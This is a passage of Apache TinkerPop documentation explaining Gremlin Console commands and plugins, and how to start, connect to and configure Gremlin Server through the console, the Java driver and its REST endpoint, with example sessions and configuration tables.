In addition to the standard commands of the link:http://groovy.codehaus.org/Groovy+Shell[Groovy Shell], Gremlin adds some other useful operations. The following table outlines the most commonly used commands:

[width="100%",cols="3,^2,10",options="header"]
|=========================================================
|Command |Alias |Description
|:help |:? |Displays list of commands and descriptions.
When followed by a command name, it will display more specific help on that particular item.
|:exit |:x |Ends the Console session.
|:import |:i |Import a class into the Console session.
|:clear |:c |Sometimes the Console can get into a state where the command buffer no longer understands input (e.g. a misplaced `(` or `}`). Use this command to clear that buffer.
|:load |:l |Load a file or URL into the command buffer for execution.
|:install |:+ |Imports a Maven library and its dependencies into the Console.
|:uninstall |:- |Removes a Maven library and its dependencies. A restart of the console is required for removal to fully take effect.
|:plugin |:pin |Plugin management functions to list, activate and deactivate available plugins.
|:remote |:rem |Configures a "remote" context where Gremlin or results of Gremlin will be processed via usage of `:submit`.
|:submit |:> |Submit Gremlin to the currently active context defined by `:remote`.
|=========================================================

Gremlin Console adds a special `max-iteration` preference that can be configured with the standard `:set` command from the Groovy Shell. Use this setting to control the maximum number of results that the Console will display. Consider the following usage:

[gremlin-groovy]
----
:set max-iteration 10
(0..200)
:set max-iteration 5
(0..200)
----

If this setting is not present, the console will default the maximum to 100 results.

Dependencies and Plugin Usage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Gremlin Console can dynamically load external code libraries and make them available to the user. Furthermore, those dependencies may contain Gremlin plugins which can expand the language, provide useful functions, etc. These important console features are managed by the `:install` and `:plugin` commands.

The following Gremlin Console session demonstrates the basics of these features:

[source,groovy]
----
gremlin> :plugin list <1>
==>tinkerpop.server[active]
==>tinkerpop.gephi
==>tinkerpop.utilities[active]
==>tinkerpop.sugar
==>tinkerpop.tinkergraph[active]
gremlin> :plugin use tinkerpop.sugar <2>
==>tinkerpop.sugar activated
gremlin> :install org.apache.tinkerpop neo4j-gremlin x.y.z <3>
==>loaded: [org.apache.tinkerpop, neo4j-gremlin, x.y.z]
gremlin> :plugin list <4>
==>tinkerpop.server[active]
==>tinkerpop.gephi
==>tinkerpop.utilities[active]
==>tinkerpop.sugar
==>tinkerpop.tinkergraph[active]
==>tinkerpop.neo4j
gremlin> :plugin use tinkerpop.neo4j <5>
==>tinkerpop.neo4j activated
gremlin> :plugin list <6>
==>tinkerpop.server[active]
==>tinkerpop.gephi
==>tinkerpop.sugar[active]
==>tinkerpop.utilities[active]
==>tinkerpop.neo4j[active]
==>tinkerpop.tinkergraph[active]
----

<1> Show a list of "available" plugins. The list of "available" plugins is determined by the classes available on the Console classpath. Plugins need to be "active" for their features to be available.
<2> To make a plugin "active" execute the `:plugin use` command and specify the name of the plugin to enable.
<3> Sometimes there are external dependencies that would be useful within the Console.
To bring those in, execute `:install` and specify the Maven coordinates for the dependency.
<4> Note that there is a "tinkerpop.neo4j" plugin available, but it is not yet "active".
<5> Again, to use the "tinkerpop.neo4j" plugin, it must be made "active" with `:plugin use`.
<6> Now when the plugin list is displayed, the "tinkerpop.neo4j" plugin is displayed as "active".

WARNING: Plugins must be compatible with the version of the Gremlin Console (or Gremlin Server) being used. Attempts to use incompatible versions cannot be guaranteed to work. Moreover, be prepared for dependency conflicts in third-party plugins, which may only be resolved via manual jar removal from the `ext/{plugin}` directory.

TIP: It is possible to manage plugin activation and deactivation by manually editing the `ext/plugins.txt` file, which contains the class names of the "active" plugins. It is also possible to clear dependencies added by `:install` by deleting them from the `ext` directory.

Script Executor
~~~~~~~~~~~~~~~

For automated tasks and batch executions of Gremlin, it can be useful to execute Gremlin scripts from the command line. Consider the following file named `gremlin.groovy`:

[source,groovy]
----
import org.apache.tinkerpop.gremlin.tinkergraph.structure.*
graph = TinkerFactory.createModern()
g = graph.traversal()
g.V().each { println it }
----

This script creates the toy graph and then iterates through all its vertices, printing each to the system out. Note that under this approach, "imports" need to be explicitly defined (except for "core" TinkerPop classes). In addition, plugins and other dependencies should already be "installed" via console commands, which cannot be used with this mode of execution. To execute this script from the command line, `gremlin.sh` has the `-e` option, used as follows:

[source,bash]
----
$ bin/gremlin.sh -e gremlin.groovy
v[1]
v[2]
v[3]
v[4]
v[5]
v[6]
----

It is also possible to pass arguments to scripts. Any parameters following the file name specification are treated as arguments to the script. They are collected into a list and passed in as a variable called "args". The following Gremlin script is exactly like the previous one, but it makes use of the "args" option to filter the vertices printed to system out:

[source,groovy]
----
import org.apache.tinkerpop.gremlin.tinkergraph.structure.*
graph = TinkerFactory.createModern()
g = graph.traversal()
g.V().has('name',args[0]).each { println it }
----

When executed from the command line a parameter can be supplied:

[source,bash]
----
$ bin/gremlin.sh -e gremlin.groovy marko
v[1]
$ bin/gremlin.sh -e gremlin.groovy vadas
v[2]
----

NOTE: The `ScriptExecutor` is for Gremlin Groovy scripts only. It is not possible to include Console plugin commands such as `:remote` or `:>` when using `-e` in these scripts. That does not mean that it is impossible to script such commands, it just means that they need to be scripted manually. For example, instead of trying to use the `:remote` command, manually construct a <<connecting-via-java,Gremlin Driver>> `Client` and submit scripts from there.

[[gremlin-server]]
Gremlin Server
--------------

image:gremlin-server.png[width=400,float=right] Gremlin Server provides a way to remotely execute Gremlin scripts against one or more `Graph` instances hosted within it.
The benefits of using Gremlin Server include:

* Allows any Gremlin Structure-enabled graph to exist as a standalone server, which in turn enables the ability for multiple clients to communicate with the same graph database.
* Enables execution of ad-hoc queries through remotely submitted Gremlin scripts.
* Allows for the hosting of Gremlin-based DSLs (Domain Specific Languages) that expand the Gremlin language to match the language of the application domain, which will help support common graph use cases such as searching, ranking, and recommendation.
* Provides a method for non-JVM languages (e.g. Python, JavaScript, etc.) to communicate with the TinkerPop stack.
* Exposes numerous methods for extension and customization to include serialization options, remote commands, etc.

NOTE: Gremlin Server is the replacement for link:http://rexster.tinkerpop.com[Rexster].

NOTE: Please see the link:http://tinkerpop.apache.org/docs/x.y.z/dev/provider/[Provider Documentation] for information on how to develop a driver for Gremlin Server.

By default, communication with Gremlin Server occurs over link:http://en.wikipedia.org/wiki/WebSocket[WebSockets] and exposes a custom sub-protocol for interacting with the server.

[[starting-gremlin-server]]
Starting Gremlin Server
~~~~~~~~~~~~~~~~~~~~~~~

Gremlin Server comes packaged with a script called `bin/gremlin-server.sh` to get it started (use `gremlin-server.bat` on Windows):

[source,text]
----
$ bin/gremlin-server.sh conf/gremlin-server-modern.yaml
[INFO] GremlinServer -
         \,,,/
         (o o)
-----oOOo-(3)-oOOo-----

[INFO] GremlinServer - Configuring Gremlin Server from conf/gremlin-server-modern.yaml
[INFO] MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics
[INFO] Graphs - Graph [graph] was successfully configured via [conf/tinkergraph-empty.properties].
[INFO] ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*
[INFO] ScriptEngines - Loaded gremlin-groovy ScriptEngine
[INFO] GremlinExecutor - Initialized gremlin-groovy ScriptEngine with scripts/generate-modern.groovy
[INFO] ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.
[INFO] ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[tinkergraph[vertices:0 edges:0], standard]
[INFO] OpLoader - Adding the standard OpProcessor.
[INFO] OpLoader - Adding the control OpProcessor.
[INFO] OpLoader - Adding the session OpProcessor.
[INFO] GremlinServer - Executing start up LifeCycleHook
[INFO] Logger$info - Loading 'modern' graph data.
[INFO] AbstractChannelizer - Configured application/vnd.gremlin-v1.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0
[INFO] AbstractChannelizer - Configured application/vnd.gremlin-v1.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0
[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.
[INFO] GremlinServer$1 - Channel started at port 8182.
----

Gremlin Server is configured by the provided link:http://www.yaml.org/[YAML] file `conf/gremlin-server-modern.yaml`. That file tells Gremlin Server many things, such as:

* The host and port to serve on
* Thread pool sizes
* Where to report metrics gathered by the server
* The serializers to make available
* The Gremlin `ScriptEngine` instances to expose and external dependencies to inject into them
* `Graph` instances to expose

The log messages printed above show a number of things, but most importantly, there is a `Graph` instance named `graph` that is exposed in Gremlin Server. This graph is an in-memory TinkerGraph and was empty at the start of the server. An initialization script at `scripts/generate-modern.groovy` was executed during startup. Its contents are as follows:

[source,groovy]
----
include::{basedir}/gremlin-server/scripts/generate-modern.groovy[]
----

The script above initializes a `Map` and assigns two key/values to it. The first, assigned to "hook", defines a `LifeCycleHook` for Gremlin Server. The "hook" provides a way to tie script code into the Gremlin Server startup and shutdown sequences. The `LifeCycleHook` has two methods that can be implemented: `onStartUp` and `onShutDown`. These events are called once at Gremlin Server start and once at Gremlin Server stop. This is an important point, because code outside of the "hook" is executed for each `ScriptEngine` creation (multiple may be created when "sessions" are enabled) and therefore the `LifeCycleHook` provides a way to ensure that a script is only executed a single time. In this case, the startup hook loads the "modern" graph into the empty TinkerGraph instance, preparing it for use. The second key/value pair assigned to the `Map`, named "g", defines a `TraversalSource` from the `Graph` bound to the "graph" variable in the YAML configuration file. This variable `g`, as well as any other variable assigned to the `Map`, will be made available as variables for future remote script executions. In more general terms, any key/value pairs assigned to a `Map` returned from the initialization script will become variables that are global to all requests. In addition, any functions that are defined will be cached for future use.

WARNING: Transactions on graphs in initialization scripts are not closed automatically after the script finishes executing. It is up to the script to properly commit or roll back transactions in the script itself.

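Since the `include` above pulls the script from the distribution, the following Groovy sketch paraphrases its general shape (the log message and loading step mirror the startup output shown earlier; details may differ from the packaged file):

[source,groovy]
----
// any Map returned from this script becomes global bindings;
// "graph" is already bound from the YAML configuration
def globals = [:]

// the hook runs once at startup rather than on every ScriptEngine creation
globals << [hook: [
    onStartUp: { ctx ->
        ctx.logger.info("Loading 'modern' graph data.")
        TinkerFactory.generateModern(graph)
    }
] as LifeCycleHook]

// expose a TraversalSource named "g" to all requests
globals << [g: graph.traversal()]
----
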
[[connecting-via-console]]
Connecting via Console
~~~~~~~~~~~~~~~~~~~~~~

With Gremlin Server running it is now possible to issue some scripts to it for processing. Start Gremlin Console as follows:

[source,text]
----
$ bin/gremlin.sh

         \,,,/
         (o o)
-----oOOo-(3)-oOOo-----
gremlin>
----

The console has the notion of a "remote", which represents a place a script will be sent from the console to be evaluated elsewhere in some other context (e.g. Gremlin Server, Hadoop, etc.). To create a remote in the console, do the following:

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote.yaml
----

The `:remote` command shown above displays the current status of the remote connection. This command can also be used to configure a new connection and change other related settings. To actually send a script to the server a different command is required:

[gremlin-groovy]
----
:> g.V().values('name')
:> g.V().has('name','marko').out('created').values('name')
:> g.E().label().groupCount()
result
:remote close
----

The `:>` command, which is a shorthand for `:submit`, sends the script to the server to execute there. Results are wrapped in a `Result` object, which is just a holder for each individual result. The `class` shows the data type for the contained value. Note that the last script sent was supposed to return a `Map`, but its `class` is `java.lang.String`. By default, the connection is configured to only return text results. In other words, Gremlin Server is using `toString` to serialize all results back to the console. This enables virtually any object on the server to be returned to the console, but it doesn't allow the opportunity to work with this data in any way in the console itself. A different configuration of the `:remote` is required to get the results back as "objects":

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote-objects.yaml <1>
:remote list <2>
:> g.E().label().groupCount() <3>
m = result[0].object <4>
m.sort {it.value}
script = """
    matthias = graph.addVertex('name','matthias')
    matthias.addEdge('co-creator',g.V().has('name','marko').next())
    """
:> @script <5>
:> g.V().has('name','matthias').out('co-creator').values('name')
:remote close
----

<1> This configuration file specifies that results should be deserialized back into an `Object` in the console, with the caveat being that the server and console both know how to serialize and deserialize the result to be returned.
<2> There are now two configured remote connections. The one marked by an asterisk is the one that was just created and denotes the current one that `:submit` will react to.
<3> When the script is executed again, the `class` is no longer shown to be a `java.lang.String`. It is instead a `java.util.HashMap`.
<4> The last result of a remote script is always stored in the reserved variable `result`, which allows access to the `Result` and by virtue of that, the `Map` itself.
<5> If the submission requires multiple lines to express, then a multi-line string can be created.
The `:>` command realizes that the user is referencing a variable via `@` and submits the string script.

TIP: In Groovy, `""" text """` is a convenient way to create a multi-line string and works well in concert with `:> @variable`. Note that this model of submitting a string variable works for all `:>` based plugins, not just Gremlin Server.

WARNING: Not all values that can be returned from a Gremlin script end up being serializable. For example, submitting `:> graph` will return a `Graph` instance and in most cases those are not serializable by Gremlin Server and will return a serialization error. It should be noted that `TinkerGraph`, as a convenience for shipping around small sub-graphs, is serializable from Gremlin Server.

The Gremlin Server `:remote config` command for the driver has the following configuration options:

[width="100%",cols="3,10a",options="header"]
|=========================================================
|Command |Description
|alias |
[width="100%",cols="3,10",options="header"]
!=========================================================
!Option !Description
! _pairs_ !A set of key/value alias/binding pairs to apply to requests.
!`reset` !Clears any aliases that were supplied in previous configurations of the remote.
!`show` !Shows the current set of aliases, which is returned as a `Map`.
!=========================================================
|timeout |Specifies the length of time in milliseconds the driver will wait for a response from the server. Specify "none" to have no timeout. By default, this setting uses "none".
|=========================================================

[[console-aliases]]
Aliases
^^^^^^^

The `alias` configuration command for the Gremlin Server `:remote` can be useful in situations where there are multiple `Graph` or `TraversalSource` instances on the server, as it becomes possible to rename them from the client for purposes of execution within the context of a script. Therefore, it becomes possible to submit commands this way:

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote-objects.yaml
:remote config alias x g
:> x.E().label().groupCount()
----

[[console-sessions]]
Sessions
^^^^^^^^

A `:remote` created in the following fashion will be "sessionless", meaning each script issued to the server with `:>` will be encased in a transaction and no state will be maintained from one request to the next.

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote-objects.yaml
----

In other words, the transaction will be automatically committed (or rolled back on error) and any variables declared in that script will be forgotten for the next request. See the section on <<sessions, "Considering Sessions">> for more information on that topic.

To enable the remote to connect with a session, the `connect` argument takes another argument as follows:

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote.yaml session
:> x = 1
:> y = 2
:> x + y
----

With the above command a session gets created with a random UUID for a session identifier. It is also possible to assign a custom session identifier by adding it as the last argument to the `:remote` command above. There is also the option to replace "session" with "session-managed" to create a session that will auto-manage transactions (i.e. each request will occur within the bounds of a transaction). In this way, the state of bound variables between requests is maintained, but the need to manually manage the transactional scope of the graph is no longer required.

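For example, a managed session with a custom identifier might be created as follows (the identifier is illustrative):

[source,groovy]
:remote connect tinkerpop.server conf/remote.yaml session-managed my-session
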
[[console-remote-console]]
Remote Console
^^^^^^^^^^^^^^

Previous examples have shown usage of the `:>` command to send scripts to Gremlin Server. The Gremlin Console also supports an additional method for doing this, which can be more convenient when the intention is to exclusively work with a remote connection to the server.

[gremlin-groovy]
----
:remote connect tinkerpop.server conf/remote.yaml session
:remote console
x = 1
y = 2
x + y
:remote console
----

In the above example, the `:remote console` command is executed. It places the console in a state where the `:>` is no longer required. Each script line is automatically submitted to Gremlin Server for evaluation. The variables `x` and `y` that were defined actually don't exist locally - they only exist on the server! In this sense, putting the console in this mode is basically like creating a window to a session on Gremlin Server.

TIP: When using `:remote console` there is not much point to using a configuration that uses a serializer that returns actual data. In other words, using a configuration like the one inside of `conf/remote-objects.yaml` isn't typically useful, as in this mode the result will only ever be displayed but not used. Using a serializer configuration like the one in `conf/remote.yaml` should perform better.

NOTE: Console commands, those that begin with a colon (e.g. `:x`, `:remote`), do not execute remotely when in this mode. They are all still evaluated locally.

[[connecting-via-java]]
Connecting via Java
~~~~~~~~~~~~~~~~~~~

[source,xml]
----
<dependency>
   <groupId>org.apache.tinkerpop</groupId>
   <artifactId>gremlin-driver</artifactId>
   <version>x.y.z</version>
</dependency>
----

image:gremlin-java.png[width=175,float=left] TinkerPop3 comes equipped with a reference client for Java-based applications. It is referred to as Gremlin Driver, which enables applications to send requests to Gremlin Server and get back results.

Gremlin code is sent to the server from a `Client` instance. A `Client` is created as follows:

[source,java]
----
Cluster cluster = Cluster.open(); <1>
Client client = cluster.connect(); <2>
----

<1> Opens a reference to `localhost` - note that there are many configuration options available in defining a `Cluster` object.
<2> Creates a `Client` given the configuration options of the `Cluster`.

Once a `Client` instance is ready, it is possible to issue some Gremlin:

[source,java]
----
ResultSet results = client.submit("[1,2,3,4]"); <1>
results.stream().map(i -> i.get(Integer.class) * 2); <2>

CompletableFuture<List<Result>> results = client.submit("[1,2,3,4]").all(); <3>

CompletableFuture<ResultSet> future = client.submitAsync("[1,2,3,4]"); <4>

Map<String,Object> params = new HashMap<>();
params.put("x",4);
client.submit("[1,2,3,x]", params); <5>
----

<1> Submits a script that simply returns a `List` of integers. This method blocks until the request is written to the server and a `ResultSet` is constructed.
<2> Even though the `ResultSet` is constructed, it does not mean that the server has sent back the results (or even evaluated the script potentially). The `ResultSet` is just a holder that is awaiting the results from the server. In this case, they are streamed from the server as they arrive.
<3> Submit a script, get a `ResultSet`, then return a `CompletableFuture` that will be called when all results have been returned.
<4> Submit a script asynchronously without waiting for the request to be written to the server.
<5> Parameterized requests are considered the most efficient way to send Gremlin to the server, as they can be cached, which will boost performance and reduce resources required on the server.

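Many of the options described in the Configuration section below can also be supplied programmatically when building the `Cluster`; a hedged sketch (host and values illustrative):

[source,java]
----
Cluster cluster = Cluster.build("192.168.0.10")
                         .port(8182)
                         .maxConnectionPoolSize(16)
                         .maxWaitForConnection(3000)
                         .create();
Client client = cluster.connect();
----
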
Configuration
^^^^^^^^^^^^^

The following table describes the various configuration options for the Gremlin Driver:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Key |Description |Default
|connectionPool.channelizer |The fully qualified classname of the client `Channelizer` that defines how to connect to the server. |`Channelizer.WebSocketChannelizer`
|connectionPool.enableSsl |Determines if SSL should be enabled or not. If enabled on the server then it must be enabled on the client. |false
|connectionPool.keyCertChainFile |The X.509 certificate chain file in PEM format. |_none_
|connectionPool.keyFile |The `PKCS#8` private key file in PEM format. |_none_
|connectionPool.keyPassword |The password of the `keyFile` if it's not password-protected. |_none_
|connectionPool.maxContentLength |The maximum length in bytes that a message can be sent to the server. This number can be no greater than the setting of the same name in the server configuration. |65536
|connectionPool.maxInProcessPerConnection |The maximum number of in-flight requests that can occur on a connection. |4
|connectionPool.maxSimultaneousUsagePerConnection |The maximum number of times that a connection can be borrowed from the pool simultaneously. |16
|connectionPool.maxSize |The maximum size of a connection pool for a host. |8
|connectionPool.maxWaitForConnection |The amount of time in milliseconds to wait for a new connection before timing out. |3000
|connectionPool.maxWaitForSessionClose |The amount of time in milliseconds to wait for a session to close before timing out (does not apply to sessionless connections). |3000
|connectionPool.minInProcessPerConnection |The minimum number of in-flight requests that can occur on a connection. |1
|connectionPool.minSimultaneousUsagePerConnection |The minimum number of times that a connection should be borrowed from the pool simultaneously. |8
|connectionPool.minSize |The minimum size of a connection pool for a host. |2
|connectionPool.reconnectInitialDelay |The amount of time in milliseconds to wait before trying to reconnect to a dead host for the first time. |1000
|connectionPool.reconnectInterval |The amount of time in milliseconds to wait before trying to reconnect to a dead host. This interval occurs after the time specified by the `reconnectInitialDelay`. |1000
|connectionPool.resultIterationBatchSize |The override value for the size of the result batches to be returned from the server. |64
|connectionPool.trustCertChainFile |File location for a SSL Certificate Chain to use when SSL is enabled. If this value is not provided and SSL is enabled, the `TrustManager` will be established with a self-signed certificate, which is NOT suitable for production purposes. |_none_
|hosts |The list of hosts that the driver will connect to. |localhost
Please see the link:http://tinkerpop.apache.org/javadocs/x.y.z/core/org/apache/tinkerpop/gremlin/driver/Cluster.Builder.html[Cluster.Builder javadoc] to get more information on these settings.

Aliases
^^^^^^^

Scripts submitted to Gremlin Server automatically have the globally configured `Graph` and `TraversalSource` instances
made available to them. Therefore, if Gremlin Server configures two `TraversalSource` instances called "g1" and "g2",
a script can simply reference them directly as:

[source,java]
client.submit("g1.V()")
client.submit("g2.V()")

While this is an acceptable way to submit scripts, it has the downside of forcing the client to encode the server-side
variable name directly into the script being sent. If the server configuration ever changed such that "g1" became
"g100", the client-side code might require a significant amount of change. Decoupling the script code from the
server configuration can be managed by the `alias` method on `Client` as follows:

[source,java]
Client g1Client = client.alias("g1")
Client g2Client = client.alias("g2")
g1Client.submit("g.V()")
g2Client.submit("g.V()")

The above code demonstrates how the `alias` method can be used such that the script need only contain a reference
to "g"; "g1" and "g2" are automatically rebound into "g" on the server-side.

Serialization
^^^^^^^^^^^^^

When using Gryo serialization (the default serializer for the driver), it is important that the client and server
have the same serializers configured or else one or the other will experience serialization exceptions and fail to
communicate. Discrepancy in serializer registration between client and server can happen fairly easily as
graphs will automatically include serializers on the server-side, thus leaving the client to be configured manually.
This can be done as follows:

[source,java]
GryoMapper kryo = GryoMapper.build().addRegistry(TitanIoRegistry.INSTANCE).create();
MessageSerializer serializer = new GryoMessageSerializerV1d0(kryo);
Cluster cluster = Cluster.build()
 .serializer(serializer)
 .create();
Client client = cluster.connect().init();

The above code demonstrates using the `TitanIoRegistry` which is an `IoRegistry` instance. It tells the serializer
what classes (from Titan in this case) to auto-register during serialization. Gremlin Server roughly uses this same
approach when it configures its serializers, so using this same model will ensure compatibility when making requests.
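
A serializer other than the default can be supplied in the same fashion. As a minimal sketch - assuming the server
is configured with a matching GraphSON serializer - the driver could be switched to GraphSON as follows:

[source,java]
----
// a minimal sketch: use GraphSON instead of the default Gryo serializer -
// the server must have a matching serializer configured
MessageSerializer serializer = new GraphSONMessageSerializerV1d0();
Cluster cluster = Cluster.build()
 .serializer(serializer)
 .create();
Client client = cluster.connect();
----
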
Connecting via REST
~~~~~~~~~~~~~~~~~~~

image:gremlin-rexster.png[width=225,float=left] While the default behavior for Gremlin Server is to provide a
WebSockets-based connection, it can also be configured to support link:http://en.wikipedia.org/wiki/Representational_state_transfer[REST].
The REST endpoint provides a communication protocol familiar to most developers, with wide support across
programming languages, tools and libraries for accessing it. As a result, REST provides a fast way to get started
with Gremlin Server. It also may represent an easier upgrade path from link:http://rexster.tinkerpop.com/[Rexster]
as the API for the endpoint is very similar to Rexster's link:https://github.com/tinkerpop/rexster/wiki/Gremlin-Extension[Gremlin Extension].

Gremlin Server provides a single REST endpoint - a Gremlin evaluator - which allows the submission of a Gremlin
script as a request. For each request, it returns a response containing the serialized results of that script.
To enable this endpoint, Gremlin Server needs to be configured with the `HttpChannelizer`, which replaces the default
`WebSocketChannelizer`, in the configuration file:

[source,yaml]
channelizer: org.apache.tinkerpop.gremlin.server.channel.HttpChannelizer

This setting is already configured in the `gremlin-server-rest-modern.yaml` file that is packaged with the Gremlin
Server distribution. To utilize it, start Gremlin Server as follows:

[source,text]
bin/gremlin-server.sh conf/gremlin-server-rest-modern.yaml

Once the server has started, issue a request. Here's an example with link:http://curl.haxx.se/[cURL]:

[source,text]
$ curl "http://localhost:8182?gremlin=100-1"

which returns:

[source,js]
{
 "result":{"data":99,"meta":{}},
 "requestId":"0581cdba-b152-45c4-80fa-3d36a6eecf1c",
 "status":{"code":200,"attributes":{},"message":""}
}

The above example showed a `GET` operation, but the preferred method for this endpoint is `POST`:

[source,text]
curl -X POST -d "{\"gremlin\":\"100-1\"}" "http://localhost:8182"

which returns:

[source,js]
{
 "result":{"data":99,"meta":{}},
 "requestId":"ef2fe16c-441d-4e13-9ddb-3c7b5dfb10ba",
 "status":{"code":200,"attributes":{},"message":""}
}

It is also preferred that Gremlin scripts be parameterized when possible via `bindings`:

[source,text]
curl -X POST -d "{\"gremlin\":\"100-x\", \"bindings\":{\"x\":1}}" "http://localhost:8182"

The `bindings` argument is a `Map` of variables where the keys become available as variables in the Gremlin script.
Note that parameterization of requests is critical to performance, as repeated script compilation can be avoided on
each request.

NOTE: It is possible to pass bindings via `GET` based requests. Query string arguments prefixed with "bindings." will
be treated as parameters, where that prefix will be removed and the value following the period will become the
parameter name. In other words, `bindings.x` will create a parameter named "x" that can be referenced in the submitted
Gremlin script. The caveat is that these arguments will always be treated as `String` values. To ensure that data
types are preserved or to pass complex objects such as lists or maps, use `POST`, which will at least support the
allowed JSON data types.
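
For JVM applications that prefer the REST endpoint over the driver, no special library is required. The following is
a minimal sketch using only JDK classes - the endpoint, script and bindings simply mirror the cURL examples above:

[source,java]
----
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;

public class RestSubmitExample {
    public static void main(String[] args) throws Exception {
        // POST a parameterized script to the Gremlin evaluator endpoint
        HttpURLConnection conn = (HttpURLConnection)
                new URL("http://localhost:8182").openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Content-Type", "application/json");
        conn.setDoOutput(true);

        String payload = "{\"gremlin\":\"100-x\", \"bindings\":{\"x\":1}}";
        try (OutputStream os = conn.getOutputStream()) {
            os.write(payload.getBytes(StandardCharsets.UTF_8));
        }

        // read back the JSON response shown in the examples above
        try (BufferedReader reader = new BufferedReader(
                new InputStreamReader(conn.getInputStream(), StandardCharsets.UTF_8))) {
            String line;
            while ((line = reader.readLine()) != null)
                System.out.println(line);
        }
    }
}
----
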
Finally, as Gremlin Server can host multiple `ScriptEngine` instances (e.g. `gremlin-groovy`, `nashorn`), it is
possible to define the language to utilize to process the request:

[source,text]
curl -X POST -d "{\"gremlin\":\"100-x\", \"language\":\"gremlin-groovy\", \"bindings\":{\"x\":1}}" "http://localhost:8182"

By default this value is set to `gremlin-groovy`. If using a `GET` operation, this value can be set as a query
string argument by setting the `language` key.

WARNING: Consider the size of the result of a submitted script being returned from the REST endpoint. A script
that iterates thousands of results will serialize each of those in memory into a single JSON result set. It is
quite possible that such a script will generate `OutOfMemoryError` exceptions on the server. Consider the default
WebSockets configuration, which supports streaming, if that type of use case is required.

Configuring
~~~~~~~~~~~

As mentioned earlier, Gremlin Server is configured through a YAML file. By default, Gremlin Server will look for a
file called `conf/gremlin-server.yaml` to configure itself on startup. To override this default, supply the file
to use to `bin/gremlin-server.sh` as in:

[source,text]
----
bin/gremlin-server.sh conf/gremlin-server-min.yaml
----

The `gremlin-server.sh` file also serves a second purpose. It can be used to "install" dependencies to the Gremlin
Server path. For example, to be able to configure and use other `Graph` implementations, the dependencies must be
made available to Gremlin Server. To do this, use the `-i` switch and supply the Maven coordinates for the dependency
to "install". For example, to use Neo4j in Gremlin Server:

[source,text]
----
bin/gremlin-server.sh -i org.apache.tinkerpop neo4j-gremlin x.y.z
----

This command will "grab" the appropriate dependencies and copy them to the `ext` directory of Gremlin Server, which
will then allow them to be "used" the next time the server is started. To uninstall dependencies, simply delete them
from the `ext` directory.

The following table describes the various configuration options that Gremlin Server expects:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Key |Description |Default
|authentication.className |The fully qualified classname of an `Authenticator` implementation to use. If this setting is not present, then authentication is effectively disabled. |`AllowAllAuthenticator`
|authentication.config |A `Map` of configuration settings to be passed to the `Authenticator` when it is constructed. The settings available are dependent on the implementation. |_none_
|channelizer |The fully qualified classname of the `Channelizer` implementation to use. A `Channelizer` is a "channel initializer" which Gremlin Server uses to define the type of processing pipeline to use. By allowing different `Channelizer` implementations, Gremlin Server can support different communication protocols (e.g. WebSockets, Java NIO, etc.). |`WebSocketChannelizer`
|graphs |A `Map` of `Graph` configuration files where the key of the `Map` becomes the name to which the `Graph` will be bound and the value is the file name of a `Graph` configuration file. 
|_none_
|gremlinPool |The number of "Gremlin" threads available to execute actual scripts in a `ScriptEngine`. This pool represents the workers available to handle blocking operations in Gremlin Server. |8
|host |The name of the host to bind the server to. |localhost
|useEpollEventLoop |Try to use epoll event loops (works only on Linux) instead of Netty NIO. |false
|maxAccumulationBufferComponents |Maximum number of request components that can be aggregated for a message. |1024
|maxChunkSize |The maximum length of the content or each chunk. If the content length exceeds this value, the transfer encoding of the decoded request will be converted to 'chunked' and the content will be split into multiple `HttpContent` objects. If the transfer encoding of the HTTP request is 'chunked' already, each chunk will be split into smaller chunks if the length of the chunk exceeds this value. |8192
|maxContentLength |The maximum length of the aggregated content for a message. Works in concert with `maxChunkSize` where chunked requests are accumulated back into a single message. A request exceeding this size will return a `413 - Request Entity Too Large` status code. A response exceeding this size will raise an internal exception. |65536
|maxHeaderSize |The maximum length of all headers. |8192
|maxInitialLineLength |The maximum length of the initial line (e.g. "GET / HTTP/1.0") processed in a request, which essentially controls the maximum length of the submitted URI. |4096
|metrics.consoleReporter.enabled |Turns on console reporting of metrics. |false
|metrics.consoleReporter.interval |Time in milliseconds between reports of metrics to the console. |180000
|metrics.csvReporter.enabled |Turns on CSV reporting of metrics. |false
|metrics.csvReporter.fileName |The file to write metrics to. |_none_
|metrics.csvReporter.interval |Time in milliseconds between reports of metrics to file. |180000
|metrics.gangliaReporter.addressingMode |Set to `MULTICAST` or `UNICAST`. |_none_
|metrics.gangliaReporter.enabled |Turns on Ganglia reporting of metrics. |false
|metrics.gangliaReporter.host |Define the Ganglia host to report metrics to. |localhost
|metrics.gangliaReporter.interval |Time in milliseconds between reports of metrics to Ganglia. |180000
|metrics.gangliaReporter.port |Define the Ganglia port to report metrics to. |8649
|metrics.graphiteReporter.enabled |Turns on Graphite reporting of metrics. |false
|metrics.graphiteReporter.host |Define the Graphite host to report metrics to. |localhost
|metrics.graphiteReporter.interval |Time in milliseconds between reports of metrics to Graphite. |180000
|metrics.graphiteReporter.port |Define the Graphite port to report metrics to. |2003
|metrics.graphiteReporter.prefix |Define a "prefix" to append to metrics keys reported to Graphite. |_none_
|metrics.jmxReporter.enabled |Turns on JMX reporting of metrics. |false
|metrics.slf4jReporter.enabled |Turns on SLF4j reporting of metrics. |false
|metrics.slf4jReporter.interval |Time in milliseconds between reports of metrics to SLF4j. |180000
|plugins |A list of plugins that should be activated on server startup in the available script engines. It assumes that the plugins are in Gremlin Server's classpath. |_none_
|port |The port to bind the server to. |8182
